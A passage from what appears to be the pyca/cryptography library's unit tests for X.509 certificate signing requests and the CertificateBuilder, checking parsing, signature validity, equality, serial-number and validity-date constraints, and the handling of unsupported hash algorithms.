b"e2f5a91d6e77dbaa0b49996ee0a0c60b55b61bd080a08bb34aa7f3e07e91f37f"
b"6a11645be2d8654c1570dcda145ed7cc92017f7d53225d7f283f3459ec5bda41"
b"cf6dd75d43676c543483385226b7e4fa29c8739f1b0eaf199613593991979862"
b"e36181e8c4c270c354b7f52c128db1b70639823324c7ea24791b7bc3d7005f3b"
)
def test_tbs_certrequest_bytes(self, backend):
request = _load_cert(
os.path.join("x509", "requests", "rsa_sha1.pem"),
x509.load_pem_x509_csr,
backend
)
assert request.tbs_certrequest_bytes == binascii.unhexlify(
b"308201840201003057310b3009060355040613025553310e300c060355040813"
b"055465786173310f300d0603550407130641757374696e310d300b060355040a"
b"130450794341311830160603550403130f63727970746f6772617068792e696f"
b"30820122300d06092a864886f70d01010105000382010f003082010a02820101"
b"00a840a78460cb861066dfa3045a94ba6cf1b7ab9d24c761cffddcc2cb5e3f1d"
b"c3e4be253e7039ef14fe9d6d2304f50d9f2e1584c51530ab75086f357138bff7"
b"b854d067d1d5f384f1f2f2c39cc3b15415e2638554ef8402648ae3ef08336f22"
b"b7ecc6d4331c2b21c3091a7f7a9518180754a646640b60419e4cc6f5c798110a"
b"7f030a639fe87e33b4776dfcd993940ec776ab57a181ad8598857976dc303f9a"
b"573ca619ab3fe596328e92806b828683edc17cc256b41948a2bfa8d047d2158d"
b"3d8e069aa05fa85b3272abb1c4b4422b6366f3b70e642377b145cd6259e5d3e7"
b"db048d51921e50766a37b1b130ee6b11f507d20a834001e8de16a92c14f2e964"
b"a30203010001a000"
)
request.public_key().verify(
request.signature,
request.tbs_certrequest_bytes,
padding.PKCS1v15(),
request.signature_hash_algorithm
)
def test_public_bytes_invalid_encoding(self, backend):
request = _load_cert(
os.path.join("x509", "requests", "rsa_sha1.pem"),
x509.load_pem_x509_csr,
backend
)
with pytest.raises(TypeError):
request.public_bytes('NotAnEncoding')
def test_signature_invalid(self, backend):
request = _load_cert(
os.path.join("x509", "requests", "invalid_signature.pem"),
x509.load_pem_x509_csr,
backend
)
assert not request.is_signature_valid
def test_signature_valid(self, backend):
request = _load_cert(
os.path.join("x509", "requests", "rsa_sha256.pem"),
x509.load_pem_x509_csr,
backend
)
assert request.is_signature_valid
@pytest.mark.parametrize(
("request_path", "loader_func", "encoding"),
[
(
os.path.join("x509", "requests", "rsa_sha1.pem"),
x509.load_pem_x509_csr,
serialization.Encoding.PEM,
),
(
os.path.join("x509", "requests", "rsa_sha1.der"),
x509.load_der_x509_csr,
serialization.Encoding.DER,
),
]
)
def test_public_bytes_match(self, request_path, loader_func, encoding,
backend):
request_bytes = load_vectors_from_file(
request_path, lambda pemfile: pemfile.read(), mode="rb"
)
request = loader_func(request_bytes, backend)
serialized = request.public_bytes(encoding)
assert serialized == request_bytes
def test_eq(self, backend):
request1 = _load_cert(
os.path.join("x509", "requests", "rsa_sha1.pem"),
x509.load_pem_x509_csr,
backend
)
request2 = _load_cert(
os.path.join("x509", "requests", "rsa_sha1.pem"),
x509.load_pem_x509_csr,
backend
)
assert request1 == request2
def test_ne(self, backend):
request1 = _load_cert(
os.path.join("x509", "requests", "rsa_sha1.pem"),
x509.load_pem_x509_csr,
backend
)
request2 = _load_cert(
os.path.join("x509", "requests", "san_rsa_sha1.pem"),
x509.load_pem_x509_csr,
backend
)
assert request1 != request2
assert request1 != object()
def test_hash(self, backend):
request1 = _load_cert(
os.path.join("x509", "requests", "rsa_sha1.pem"),
x509.load_pem_x509_csr,
backend
)
request2 = _load_cert(
os.path.join("x509", "requests", "rsa_sha1.pem"),
x509.load_pem_x509_csr,
backend
)
request3 = _load_cert(
os.path.join("x509", "requests", "san_rsa_sha1.pem"),
x509.load_pem_x509_csr,
backend
)
assert hash(request1) == hash(request2)
assert hash(request1) != hash(request3)
def test_build_cert(self, backend):
issuer_private_key = RSA_KEY_2048.private_key(backend)
subject_private_key = RSA_KEY_2048.private_key(backend)
not_valid_before = datetime.datetime(2002, 1, 1, 12, 1)
not_valid_after = datetime.datetime(2030, 12, 31, 8, 30)
builder = x509.CertificateBuilder().serial_number(
777
).issuer_name(x509.Name([
x509.NameAttribute(NameOID.COUNTRY_NAME, u'US'),
x509.NameAttribute(NameOID.STATE_OR_PROVINCE_NAME, u'Texas'),
x509.NameAttribute(NameOID.LOCALITY_NAME, u'Austin'),
x509.NameAttribute(NameOID.ORGANIZATION_NAME, u'PyCA'),
x509.NameAttribute(NameOID.COMMON_NAME, u'cryptography.io'),
])).subject_name(x509.Name([
x509.NameAttribute(NameOID.COUNTRY_NAME, u'US'),
x509.NameAttribute(NameOID.STATE_OR_PROVINCE_NAME, u'Texas'),
x509.NameAttribute(NameOID.LOCALITY_NAME, u'Austin'),
x509.NameAttribute(NameOID.ORGANIZATION_NAME, u'PyCA'),
x509.NameAttribute(NameOID.COMMON_NAME, u'cryptography.io'),
])).public_key(
subject_private_key.public_key()
).add_extension(
x509.BasicConstraints(ca=False, path_length=None), True,
).add_extension(
x509.SubjectAlternativeName([x509.DNSName(u"cryptography.io")]),
critical=False,
).not_valid_before(
not_valid_before
).not_valid_after(
not_valid_after
)
cert = builder.sign(issuer_private_key, hashes.SHA1(), backend)
assert cert.version is x509.Version.v3
assert cert.not_valid_before == not_valid_before
assert cert.not_valid_after == not_valid_after
basic_constraints = cert.extensions.get_extension_for_oid(
ExtensionOID.BASIC_CONSTRAINTS
)
assert basic_constraints.value.ca is False
assert basic_constraints.value.path_length is None
subject_alternative_name = cert.extensions.get_extension_for_oid(
ExtensionOID.SUBJECT_ALTERNATIVE_NAME
)
assert list(subject_alternative_name.value) == [
x509.DNSName(u"cryptography.io"),
]
def test_build_cert_private_type_encoding(self, backend):
issuer_private_key = RSA_KEY_2048.private_key(backend)
subject_private_key = RSA_KEY_2048.private_key(backend)
not_valid_before = datetime.datetime(2002, 1, 1, 12, 1)
not_valid_after = datetime.datetime(2030, 12, 31, 8, 30)
name = x509.Name([
x509.NameAttribute(
NameOID.STATE_OR_PROVINCE_NAME, u'Texas',
_ASN1Type.PrintableString),
x509.NameAttribute(NameOID.LOCALITY_NAME, u'Austin'),
x509.NameAttribute(
NameOID.COMMON_NAME, u'cryptography.io', _ASN1Type.IA5String),
])
builder = x509.CertificateBuilder().serial_number(
777
).issuer_name(
name
).subject_name(
name
).public_key(
subject_private_key.public_key()
).not_valid_before(
not_valid_before
).not_valid_after(not_valid_after)
cert = builder.sign(issuer_private_key, hashes.SHA256(), backend)
for dn in (cert.subject, cert.issuer):
assert dn.get_attributes_for_oid(
NameOID.STATE_OR_PROVINCE_NAME
)[0]._type == _ASN1Type.PrintableString
assert dn.get_attributes_for_oid(
NameOID.STATE_OR_PROVINCE_NAME
)[0]._type == _ASN1Type.PrintableString
assert dn.get_attributes_for_oid(
NameOID.LOCALITY_NAME
)[0]._type == _ASN1Type.UTF8String
def test_build_cert_printable_string_country_name(self, backend):
issuer_private_key = RSA_KEY_2048.private_key(backend)
subject_private_key = RSA_KEY_2048.private_key(backend)
not_valid_before = datetime.datetime(2002, 1, 1, 12, 1)
not_valid_after = datetime.datetime(2030, 12, 31, 8, 30)
builder = x509.CertificateBuilder().serial_number(
777
).issuer_name(x509.Name([
x509.NameAttribute(NameOID.COUNTRY_NAME, u'US'),
x509.NameAttribute(NameOID.JURISDICTION_COUNTRY_NAME, u'US'),
x509.NameAttribute(NameOID.STATE_OR_PROVINCE_NAME, u'Texas'),
])).subject_name(x509.Name([
x509.NameAttribute(NameOID.COUNTRY_NAME, u'US'),
x509.NameAttribute(NameOID.JURISDICTION_COUNTRY_NAME, u'US'),
x509.NameAttribute(NameOID.STATE_OR_PROVINCE_NAME, u'Texas'),
])).public_key(
subject_private_key.public_key()
).not_valid_before(
not_valid_before
).not_valid_after(
not_valid_after
)
cert = builder.sign(issuer_private_key, hashes.SHA256(), backend)
parsed = _parse_cert(cert.public_bytes(serialization.Encoding.DER))
subject = parsed.subject
issuer = parsed.issuer
def read_next_rdn_value_tag(reader):
# Assume each RDN has a single attribute.
with reader.read_element(SET) as rdn:
attribute = rdn.read_element(SEQUENCE)
with attribute:
_ = attribute.read_element(OBJECT_IDENTIFIER)
tag, value = attribute.read_any_element()
return tag
# Check that each value was encoded as an ASN.1 PRINTABLESTRING.
assert read_next_rdn_value_tag(subject) == PRINTABLE_STRING
assert read_next_rdn_value_tag(issuer) == PRINTABLE_STRING
if (
# This only works correctly in OpenSSL 1.1.0f+ and 1.0.2l+
backend._lib.CRYPTOGRAPHY_OPENSSL_110F_OR_GREATER or (
backend._lib.CRYPTOGRAPHY_OPENSSL_102L_OR_GREATER and
not backend._lib.CRYPTOGRAPHY_OPENSSL_110_OR_GREATER
)
):
assert read_next_rdn_value_tag(subject) == PRINTABLE_STRING
assert read_next_rdn_value_tag(issuer) == PRINTABLE_STRING
class TestCertificateBuilder(object):
@pytest.mark.requires_backend_interface(interface=RSABackend)
@pytest.mark.requires_backend_interface(interface=X509Backend)
def test_checks_for_unsupported_extensions(self, backend):
private_key = RSA_KEY_2048.private_key(backend)
builder = x509.CertificateBuilder().subject_name(x509.Name([
x509.NameAttribute(NameOID.COUNTRY_NAME, u'US'),
])).issuer_name(x509.Name([
x509.NameAttribute(NameOID.COUNTRY_NAME, u'US'),
])).public_key(
private_key.public_key()
).serial_number(
777
).not_valid_before(
datetime.datetime(1999, 1, 1)
).not_valid_after(
datetime.datetime(2020, 1, 1)
).add_extension(
DummyExtension(), False
)
with pytest.raises(NotImplementedError):
builder.sign(private_key, hashes.SHA1(), backend)
@pytest.mark.requires_backend_interface(interface=RSABackend)
@pytest.mark.requires_backend_interface(interface=X509Backend)
def test_encode_nonstandard_aia(self, backend):
private_key = RSA_KEY_2048.private_key(backend)
aia = x509.AuthorityInformationAccess([
x509.AccessDescription(
x509.ObjectIdentifier("2.999.7"),
x509.UniformResourceIdentifier(u"http://example.com")
),
])
builder = x509.CertificateBuilder().subject_name(x509.Name([
x509.NameAttribute(NameOID.COUNTRY_NAME, u'US'),
])).issuer_name(x509.Name([
x509.NameAttribute(NameOID.COUNTRY_NAME, u'US'),
])).public_key(
private_key.public_key()
).serial_number(
777
).not_valid_before(
datetime.datetime(1999, 1, 1)
).not_valid_after(
datetime.datetime(2020, 1, 1)
).add_extension(
aia, False
)
builder.sign(private_key, hashes.SHA256(), backend)
@pytest.mark.requires_backend_interface(interface=RSABackend)
@pytest.mark.requires_backend_interface(interface=X509Backend)
def test_subject_dn_asn1_types(self, backend):
private_key = RSA_KEY_2048.private_key(backend)
name = x509.Name([
x509.NameAttribute(NameOID.COMMON_NAME, u"mysite.com"),
x509.NameAttribute(NameOID.COUNTRY_NAME, u"US"),
x509.NameAttribute(NameOID.LOCALITY_NAME, u"value"),
x509.NameAttribute(NameOID.STATE_OR_PROVINCE_NAME, u"value"),
x509.NameAttribute(NameOID.STREET_ADDRESS, u"value"),
x509.NameAttribute(NameOID.ORGANIZATION_NAME, u"value"),
x509.NameAttribute(NameOID.ORGANIZATIONAL_UNIT_NAME, u"value"),
x509.NameAttribute(NameOID.SERIAL_NUMBER, u"value"),
x509.NameAttribute(NameOID.SURNAME, u"value"),
x509.NameAttribute(NameOID.GIVEN_NAME, u"value"),
x509.NameAttribute(NameOID.TITLE, u"value"),
x509.NameAttribute(NameOID.GENERATION_QUALIFIER, u"value"),
x509.NameAttribute(NameOID.X500_UNIQUE_IDENTIFIER, u"value"),
x509.NameAttribute(NameOID.DN_QUALIFIER, u"value"),
x509.NameAttribute(NameOID.PSEUDONYM, u"value"),
x509.NameAttribute(NameOID.USER_ID, u"value"),
x509.NameAttribute(NameOID.DOMAIN_COMPONENT, u"value"),
x509.NameAttribute(NameOID.EMAIL_ADDRESS, u"value"),
x509.NameAttribute(NameOID.JURISDICTION_COUNTRY_NAME, u"US"),
x509.NameAttribute(NameOID.JURISDICTION_LOCALITY_NAME, u"value"),
x509.NameAttribute(
NameOID.JURISDICTION_STATE_OR_PROVINCE_NAME, u"value"
),
x509.NameAttribute(NameOID.BUSINESS_CATEGORY, u"value"),
x509.NameAttribute(NameOID.POSTAL_ADDRESS, u"value"),
x509.NameAttribute(NameOID.POSTAL_CODE, u"value"),
])
cert = x509.CertificateBuilder().subject_name(
name
).issuer_name(
name
).public_key(
private_key.public_key()
).serial_number(
777
).not_valid_before(
datetime.datetime(1999, 1, 1)
).not_valid_after(
datetime.datetime(2020, 1, 1)
).sign(private_key, hashes.SHA256(), backend)
for dn in (cert.subject, cert.issuer):
for oid, asn1_type in TestNameAttribute.EXPECTED_TYPES:
assert dn.get_attributes_for_oid(
oid
)[0]._type == asn1_type
@pytest.mark.parametrize(
("not_valid_before", "not_valid_after"),
[
[datetime.datetime(1970, 2, 1), datetime.datetime(9999, 1, 1)],
[datetime.datetime(1970, 2, 1), datetime.datetime(9999, 12, 31)],
]
)
@pytest.mark.requires_backend_interface(interface=RSABackend)
@pytest.mark.requires_backend_interface(interface=X509Backend)
def test_extreme_times(self, not_valid_before, not_valid_after, backend):
private_key = RSA_KEY_2048.private_key(backend)
builder = x509.CertificateBuilder().subject_name(x509.Name([
x509.NameAttribute(NameOID.COUNTRY_NAME, u'US'),
])).issuer_name(x509.Name([
x509.NameAttribute(NameOID.COUNTRY_NAME, u'US'),
])).public_key(
private_key.public_key()
).serial_number(
777
).not_valid_before(
not_valid_before
).not_valid_after(
not_valid_after
)
cert = builder.sign(private_key, hashes.SHA256(), backend)
assert cert.not_valid_before == not_valid_before
assert cert.not_valid_after == not_valid_after
parsed = _parse_cert(cert.public_bytes(serialization.Encoding.DER))
assert parsed.not_before_tag == UTC_TIME
assert parsed.not_after_tag == GENERALIZED_TIME
@pytest.mark.requires_backend_interface(interface=RSABackend)
@pytest.mark.requires_backend_interface(interface=X509Backend)
def test_no_subject_name(self, backend):
subject_private_key = RSA_KEY_2048.private_key(backend)
builder = x509.CertificateBuilder().serial_number(
777
).issuer_name(x509.Name([
x509.NameAttribute(NameOID.COUNTRY_NAME, u'US'),
])).public_key(
subject_private_key.public_key()
).not_valid_before(
datetime.datetime(2002, 1, 1, 12, 1)
).not_valid_after(
datetime.datetime(2030, 12, 31, 8, 30)
)
with pytest.raises(ValueError):
builder.sign(subject_private_key, hashes.SHA256(), backend)
@pytest.mark.requires_backend_interface(interface=RSABackend)
@pytest.mark.requires_backend_interface(interface=X509Backend)
def test_no_issuer_name(self, backend):
subject_private_key = RSA_KEY_2048.private_key(backend)
builder = x509.CertificateBuilder().serial_number(
777
).subject_name(x509.Name([
x509.NameAttribute(NameOID.COUNTRY_NAME, u'US'),
])).public_key(
subject_private_key.public_key()
).not_valid_before(
datetime.datetime(2002, 1, 1, 12, 1)
).not_valid_after(
datetime.datetime(2030, 12, 31, 8, 30)
)
with pytest.raises(ValueError):
builder.sign(subject_private_key, hashes.SHA256(), backend)
@pytest.mark.requires_backend_interface(interface=RSABackend)
@pytest.mark.requires_backend_interface(interface=X509Backend)
def test_no_public_key(self, backend):
subject_private_key = RSA_KEY_2048.private_key(backend)
builder = x509.CertificateBuilder().serial_number(
777
).issuer_name(x509.Name([
x509.NameAttribute(NameOID.COUNTRY_NAME, u'US'),
])).subject_name(x509.Name([
x509.NameAttribute(NameOID.COUNTRY_NAME, u'US'),
])).not_valid_before(
datetime.datetime(2002, 1, 1, 12, 1)
).not_valid_after(
datetime.datetime(2030, 12, 31, 8, 30)
)
with pytest.raises(ValueError):
builder.sign(subject_private_key, hashes.SHA256(), backend)
@pytest.mark.requires_backend_interface(interface=RSABackend)
@pytest.mark.requires_backend_interface(interface=X509Backend)
def test_no_not_valid_before(self, backend):
subject_private_key = RSA_KEY_2048.private_key(backend)
builder = x509.CertificateBuilder().serial_number(
777
).issuer_name(x509.Name([
x509.NameAttribute(NameOID.COUNTRY_NAME, u'US'),
])).subject_name(x509.Name([
x509.NameAttribute(NameOID.COUNTRY_NAME, u'US'),
])).public_key(
subject_private_key.public_key()
).not_valid_after(
datetime.datetime(2030, 12, 31, 8, 30)
)
with pytest.raises(ValueError):
builder.sign(subject_private_key, hashes.SHA256(), backend)
@pytest.mark.requires_backend_interface(interface=RSABackend)
@pytest.mark.requires_backend_interface(interface=X509Backend)
def test_no_not_valid_after(self, backend):
subject_private_key = RSA_KEY_2048.private_key(backend)
builder = x509.CertificateBuilder().serial_number(
777
).issuer_name(x509.Name([
x509.NameAttribute(NameOID.COUNTRY_NAME, u'US'),
])).subject_name(x509.Name([
x509.NameAttribute(NameOID.COUNTRY_NAME, u'US'),
])).public_key(
subject_private_key.public_key()
).not_valid_before(
datetime.datetime(2002, 1, 1, 12, 1)
)
with pytest.raises(ValueError):
builder.sign(subject_private_key, hashes.SHA256(), backend)
@pytest.mark.requires_backend_interface(interface=RSABackend)
@pytest.mark.requires_backend_interface(interface=X509Backend)
def test_no_serial_number(self, backend):
subject_private_key = RSA_KEY_2048.private_key(backend)
builder = x509.CertificateBuilder().issuer_name(x509.Name([
x509.NameAttribute(NameOID.COUNTRY_NAME, u'US'),
])).subject_name(x509.Name([
x509.NameAttribute(NameOID.COUNTRY_NAME, u'US'),
])).public_key(
subject_private_key.public_key()
).not_valid_before(
datetime.datetime(2002, 1, 1, 12, 1)
).not_valid_after(
datetime.datetime(2030, 12, 31, 8, 30)
)
with pytest.raises(ValueError):
builder.sign(subject_private_key, hashes.SHA256(), backend)
def test_issuer_name_must_be_a_name_type(self):
builder = x509.CertificateBuilder()
with pytest.raises(TypeError):
builder.issuer_name("subject")
with pytest.raises(TypeError):
builder.issuer_name(object)
def test_issuer_name_may_only_be_set_once(self):
name = x509.Name([
x509.NameAttribute(NameOID.COUNTRY_NAME, u'US'),
])
builder = x509.CertificateBuilder().issuer_name(name)
with pytest.raises(ValueError):
builder.issuer_name(name)
def test_subject_name_must_be_a_name_type(self):
builder = x509.CertificateBuilder()
with pytest.raises(TypeError):
builder.subject_name("subject")
with pytest.raises(TypeError):
builder.subject_name(object)
def test_subject_name_may_only_be_set_once(self):
name = x509.Name([
x509.NameAttribute(NameOID.COUNTRY_NAME, u'US'),
])
builder = x509.CertificateBuilder().subject_name(name)
with pytest.raises(ValueError):
builder.subject_name(name)
def test_not_valid_before_after_not_valid_after(self):
builder = x509.CertificateBuilder()
builder = builder.not_valid_after(
datetime.datetime(2002, 1, 1, 12, 1)
)
with pytest.raises(ValueError):
builder.not_valid_before(
datetime.datetime(2003, 1, 1, 12, 1)
)
def test_not_valid_after_before_not_valid_before(self):
builder = x509.CertificateBuilder()
builder = builder.not_valid_before(
datetime.datetime(2002, 1, 1, 12, 1)
)
with pytest.raises(ValueError):
builder.not_valid_after(
datetime.datetime(2001, 1, 1, 12, 1)
)
@pytest.mark.requires_backend_interface(interface=RSABackend)
@pytest.mark.requires_backend_interface(interface=X509Backend)
def test_public_key_must_be_public_key(self, backend):
private_key = RSA_KEY_2048.private_key(backend)
builder = x509.CertificateBuilder()
with pytest.raises(TypeError):
builder.public_key(private_key)
@pytest.mark.requires_backend_interface(interface=RSABackend)
@pytest.mark.requires_backend_interface(interface=X509Backend)
def test_public_key_may_only_be_set_once(self, backend):
private_key = RSA_KEY_2048.private_key(backend)
public_key = private_key.public_key()
builder = x509.CertificateBuilder().public_key(public_key)
with pytest.raises(ValueError):
builder.public_key(public_key)
def test_serial_number_must_be_an_integer_type(self):
with pytest.raises(TypeError):
x509.CertificateBuilder().serial_number(10.0)
def test_serial_number_must_be_non_negative(self):
with pytest.raises(ValueError):
x509.CertificateBuilder().serial_number(-1)
def test_serial_number_must_be_positive(self):
with pytest.raises(ValueError):
x509.CertificateBuilder().serial_number(0)
@pytest.mark.requires_backend_interface(interface=RSABackend)
@pytest.mark.requires_backend_interface(interface=X509Backend)
def test_minimal_serial_number(self, backend):
subject_private_key = RSA_KEY_2048.private_key(backend)
builder = x509.CertificateBuilder().serial_number(
1
).subject_name(x509.Name([
x509.NameAttribute(NameOID.COUNTRY_NAME, u'RU'),
])).issuer_name(x509.Name([
x509.NameAttribute(NameOID.COUNTRY_NAME, u'RU'),
])).public_key(
subject_private_key.public_key()
).not_valid_before(
datetime.datetime(2002, 1, 1, 12, 1)
).not_valid_after(
datetime.datetime(2030, 12, 31, 8, 30)
)
cert = builder.sign(subject_private_key, hashes.SHA256(), backend)
assert cert.serial_number == 1
@pytest.mark.requires_backend_interface(interface=RSABackend)
@pytest.mark.requires_backend_interface(interface=X509Backend)
def test_biggest_serial_number(self, backend):
subject_private_key = RSA_KEY_2048.private_key(backend)
builder = x509.CertificateBuilder().serial_number(
(1 << 159) - 1
).subject_name(x509.Name([
x509.NameAttribute(NameOID.COUNTRY_NAME, u'RU'),
])).issuer_name(x509.Name([
x509.NameAttribute(NameOID.COUNTRY_NAME, u'RU'),
])).public_key(
subject_private_key.public_key()
).not_valid_before(
datetime.datetime(2002, 1, 1, 12, 1)
).not_valid_after(
datetime.datetime(2030, 12, 31, 8, 30)
)
cert = builder.sign(subject_private_key, hashes.SHA256(), backend)
assert cert.serial_number == (1 << 159) - 1
def test_serial_number_must_be_less_than_160_bits_long(self):
with pytest.raises(ValueError):
x509.CertificateBuilder().serial_number(1 << 159)
def test_serial_number_may_only_be_set_once(self):
builder = x509.CertificateBuilder().serial_number(10)
with pytest.raises(ValueError):
builder.serial_number(20)
@pytest.mark.requires_backend_interface(interface=RSABackend)
@pytest.mark.requires_backend_interface(interface=X509Backend)
def test_aware_not_valid_after(self, backend):
time = datetime.datetime(2012, 1, 16, 22, 43)
tz = pytz.timezone("US/Pacific")
time = tz.localize(time)
utc_time = datetime.datetime(2012, 1, 17, 6, 43)
private_key = RSA_KEY_2048.private_key(backend)
cert_builder = x509.CertificateBuilder().not_valid_after(time)
cert_builder = cert_builder.subject_name(
x509.Name([x509.NameAttribute(NameOID.COUNTRY_NAME, u'US')])
).issuer_name(
x509.Name([x509.NameAttribute(NameOID.COUNTRY_NAME, u'US')])
).serial_number(
1
).public_key(
private_key.public_key()
).not_valid_before(
utc_time - datetime.timedelta(days=365)
)
cert = cert_builder.sign(private_key, hashes.SHA256(), backend)
assert cert.not_valid_after == utc_time
@pytest.mark.requires_backend_interface(interface=RSABackend)
@pytest.mark.requires_backend_interface(interface=X509Backend)
def test_earliest_time(self, backend):
time = datetime.datetime(1950, 1, 1)
private_key = RSA_KEY_2048.private_key(backend)
cert_builder = x509.CertificateBuilder().subject_name(
x509.Name([x509.NameAttribute(NameOID.COUNTRY_NAME, u'US')])
).issuer_name(
x509.Name([x509.NameAttribute(NameOID.COUNTRY_NAME, u'US')])
).serial_number(
1
).public_key(
private_key.public_key()
).not_valid_before(
time
).not_valid_after(
time
)
cert = cert_builder.sign(private_key, hashes.SHA256(), backend)
assert cert.not_valid_before == time
assert cert.not_valid_after == time
parsed = _parse_cert(cert.public_bytes(serialization.Encoding.DER))
assert parsed.not_before_tag == UTC_TIME
assert parsed.not_after_tag == UTC_TIME
def test_invalid_not_valid_after(self):
with pytest.raises(TypeError):
x509.CertificateBuilder().not_valid_after(104204304504)
with pytest.raises(TypeError):
x509.CertificateBuilder().not_valid_after(datetime.time())
with pytest.raises(ValueError):
x509.CertificateBuilder().not_valid_after(
datetime.datetime(1940, 8, 10)
)
def test_not_valid_after_may_only_be_set_once(self):
builder = x509.CertificateBuilder().not_valid_after(
datetime.datetime.now()
)
with pytest.raises(ValueError):
builder.not_valid_after(
datetime.datetime.now()
)
@pytest.mark.requires_backend_interface(interface=RSABackend)
@pytest.mark.requires_backend_interface(interface=X509Backend)
def test_aware_not_valid_before(self, backend):
time = datetime.datetime(2012, 1, 16, 22, 43)
tz = pytz.timezone("US/Pacific")
time = tz.localize(time)
utc_time = datetime.datetime(2012, 1, 17, 6, 43)
private_key = RSA_KEY_2048.private_key(backend)
cert_builder = x509.CertificateBuilder().not_valid_before(time)
cert_builder = cert_builder.subject_name(
x509.Name([x509.NameAttribute(NameOID.COUNTRY_NAME, u'US')])
).issuer_name(
x509.Name([x509.NameAttribute(NameOID.COUNTRY_NAME, u'US')])
).serial_number(
1
).public_key(
private_key.public_key()
).not_valid_after(
utc_time + datetime.timedelta(days=366)
)
cert = cert_builder.sign(private_key, hashes.SHA256(), backend)
assert cert.not_valid_before == utc_time
def test_invalid_not_valid_before(self):
with pytest.raises(TypeError):
x509.CertificateBuilder().not_valid_before(104204304504)
with pytest.raises(TypeError):
x509.CertificateBuilder().not_valid_before(datetime.time())
with pytest.raises(ValueError):
x509.CertificateBuilder().not_valid_before(
datetime.datetime(1940, 8, 10)
)
def test_not_valid_before_may_only_be_set_once(self):
builder = x509.CertificateBuilder().not_valid_before(
datetime.datetime.now()
)
with pytest.raises(ValueError):
builder.not_valid_before(
datetime.datetime.now()
)
def test_add_extension_checks_for_duplicates(self):
builder = x509.CertificateBuilder().add_extension(
x509.BasicConstraints(ca=False, path_length=None), True,
)
with pytest.raises(ValueError):
builder.add_extension(
x509.BasicConstraints(ca=False, path_length=None), True,
)
def test_add_invalid_extension_type(self):
builder = x509.CertificateBuilder()
with pytest.raises(TypeError):
builder.add_extension(object(), False)
@pytest.mark.requires_backend_interface(interface=RSABackend)
@pytest.mark.requires_backend_interface(interface=X509Backend)
@pytest.mark.parametrize(
"algorithm",
[
object(), None
]
)
def test_sign_with_unsupported_hash(self, algorithm, backend):
private_key = RSA_KEY_2048.private_key(backend)
builder = x509.CertificateBuilder()
builder = builder.subject_name(
x509.Name([x509.NameAttribute(NameOID.COUNTRY_NAME, u'US')])
).issuer_name(
x509.Name([x509.NameAttribute(NameOID.COUNTRY_NAME, u'US')])
).serial_number(
1
).public_key(
private_key.public_key()
).not_valid_before(
datetime.datetime(2002, 1, 1, 12, 1)
).not_valid_after(
datetime.datetime(2032, 1, 1, 12, 1)
)
with pytest.raises(TypeError):
builder.sign(private_key, algorithm, backend)
@pytest.mark.supported(
only_if=lambda backend: backend.ed25519_supported(),
skip_message="Requires OpenSSL with Ed25519 support"
)
@pytest.mark.requires_backend_interface(interface=X509Backend)
def test_sign_with_unsupported_hash_ed25519(self, backend):
private_key = ed25519.Ed25519PrivateKey.generate()
builder = x509.CertificateBuilder().subject_name(
x509.Name([x509.NameAttribute(NameOID.COUNTRY_NAME, u'US')])
).issuer_name(
x509.Name([x509.NameAttribute(NameOID.COUNTRY_NAME, u'US')])
).serial_number(
1
).public_key(
private_key.public_key()
).not_valid_before(
datetime.datetime(2002, 1, 1, 12, 1)
).not_valid_after(
datetime.datetime(2032, 1, 1, 12, 1)
)
with pytest.raises(ValueError):
builder.sign(private_key, hashes.SHA256(), backend)
@pytest.mark.supported(
only_if=lambda backend: backend.ed448_supported(),
skip_message="Requires OpenSSL with Ed448 support"
)
@pytest.mark.requires_backend_interface(interface=X509Backend)
def test_sign_with_unsupported_hash_ed448(self, backend):
private_key = ed448.Ed448PrivateKey.generate()
builder = x509.CertificateBuilder().subject_name(
x509.Name([x509.NameAttribute(NameOID.COUNTRY_NAME, u'US')])
).issuer_name(
x509.Name([x509.NameAttribute(NameOID.COUNTRY_NAME, u'US')])
).serial_number(
1
).public_key(
private_key.public_key()
).not_valid_before(
datetime.datetime(2002, 1, 1, 12, 1)
).not_valid_after(
datetime.datetime(2032, 1, 1, 12, 1)
)
with pytest.raises(ValueError):
builder.sign(private_key, hashes.SHA256(), backend)
@pytest.mark.requires_backend_interface(interface=RSABackend)
@pytest.mark.requires_backend_interface(interface=X509Backend)
@pytest.mark.supported(
only_if=lambda backend: backend.hash_supported(hashes.MD5()),
skip_message="Requires OpenSSL with MD5 support"
)
def test_sign_rsa_with_md5(self, backend):
private_key = RSA_KEY_2048.private_key(backend)
builder = x509.CertificateBuilder()
builder = builder.subject_name(
x509.Name([x509.NameAttribute(NameOID.COUNTRY_NAME, u'US')])
).issuer_name(
x509.Name([x509.NameAttribute(NameOID.COUNTRY_NAME, u'US')])
).serial_number(
1
).public_key(
private_key.public_key()
).not_valid_before(
datetime.datetime(2002, 1, 1, 12, 1)
).not_valid_after(
datetime.datetime(2032, 1, 1, 12, 1)
)
cert = builder.sign(private_key, hashes.MD5(), backend)
assert isinstance(cert.signature_hash_algorithm, hashes.MD5)
@pytest.mark.requires_backend_interface(interface=DSABackend)
@pytest.mark.requires_backend_interface(interface=X509Backend)
@pytest.mark.supported(
only_if=lambda backend: backend.hash_supported(hashes.MD5()),
skip_message="Requires OpenSSL with MD5 support"
)
def test_sign_dsa_with_md5(self, backend):
private_key = DSA_KEY_2048.private_key(backend)
builder = x509.CertificateBuilder()
builder = builder.subject_name(
x509.Name([x509.NameAttribute(NameOID.COUNTRY_NAME, u'US')])
).issuer_name(
x509.Name([x509.NameAttribute(NameOID.COUNTRY_NAME, u'US')])
).serial_number(
1
).public_key(
private_key.public_key()
).not_valid_before(
datetime.datetime(2002, 1, 1, 12, 1)
).not_valid_after(
datetime.datetime(2032, 1, 1, 12, 1)
)
with pytest.raises(ValueError):
builder.sign(private_key, hashes.MD5(), backend)
@pytest.mark.requires_backend_interface(interface=EllipticCurveBackend)
@pytest.mark.requires_backend_interface(interface=X509Backend)
@pytest.mark.supported(
only_if=lambda backend: backend.hash_supported(hashes.MD5()),
skip_message="Requires OpenSSL with MD5 support"
)
def test_sign_ec_with_md5(self, backend):
_skip_curve_unsupported(backend, ec.SECP256R1())
private_key = EC_KEY_SECP256R1.private_key(backend)
builder = x509.CertificateBuilder()
builder = builder.subject_name(
x509.Name([x509.NameAttribute(NameOID.COUNTRY_NAME, u'US')])
).issuer_name(
x509.Name([x509.NameAttribute(NameOID.COUNTRY_NAME, u'US')])
).serial_number(
1
).public_key(
private_key.public_key()
).not_valid_before(
datetime.datetime(2002, 1, 1, 12, 1)
).not_valid_after(
datetime.datetime(2032, 1, 1, 12, 1)
)
with pytest.raises(ValueError):
builder.sign(private_key, hashes.MD5(), backend)
